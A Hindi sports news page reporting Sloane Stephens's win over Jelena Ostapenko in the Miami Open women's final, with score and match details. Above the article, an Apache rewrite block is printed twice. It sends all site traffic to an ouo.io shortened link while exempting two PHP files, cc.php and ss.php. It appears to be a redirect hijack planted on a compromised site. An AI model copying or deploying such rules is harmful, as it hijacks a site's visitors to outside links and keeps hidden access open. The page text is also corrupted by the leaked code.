
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 928
मियामी। अमेरिका की सोलाने स्टीफेंस ने घरेलू दर्शकों के सामने मियामी ओपन के महिला एकल वर्ग फाइनल में लातविया की येलेना ओस्टापेंको को मात देकर खिताब अपने नाम कर लिया है। स्टीफेंस ने ओस्टापेंको को 7-6 (7-5), 6-1 से मात दी। एजेंसी से प्राप्त समाचार के अनुसार मौजूदा अमेरिकी ओपन विजेता की रणनीति ओस्टापेंको के खिलाफ सटीक बैठी और 2017 में फ्रेंच ओपन का खिताब अपने नाम करने वाली लातविया की यह खिलाड़ी मुकाबला हार गई। वल्र्ड नंबर-12 स्टीफेंस ने इस मैच में छह विनर्स लगाए जबकि 21 गैरबाजिव गलतियां कीं। ओस्टापेंको ने 10 विनर्स लगाए। स्टीफेंस ने पहले सेट से ही ओस्टापेंको पर दबाव बनाया और 5-3 की बढ़त ले ली, लेकिन लातवियाई खिलाड़ी ने वापसी की और स्कोर 4-5 कर लिया। इसके बाद यह सेट टाई ब्रेकर में पहुंच गया जहां ओस्टापेंको मात खा गईं।
ओस्टापेंको ने इसके बाद दूसरे सेट में शानदार शुरुआत की और 1-0 से बढ़त ले ली, लेकिन स्टीफेंस ने इसके बाद बराबरी की और फिर ओस्टापेंको से आगे निकल कर खिताब अपने नाम कर ले गईं। स्टीफेंस ने कहा, मैं हमेशा अमेरिका में अच्छी खेलती हूं। मैं नहीं जानती क्यों लेकिन मुझे लगता है कि मैं आपके (प्रशंसक) कारण ऐसा कर पाती हूं।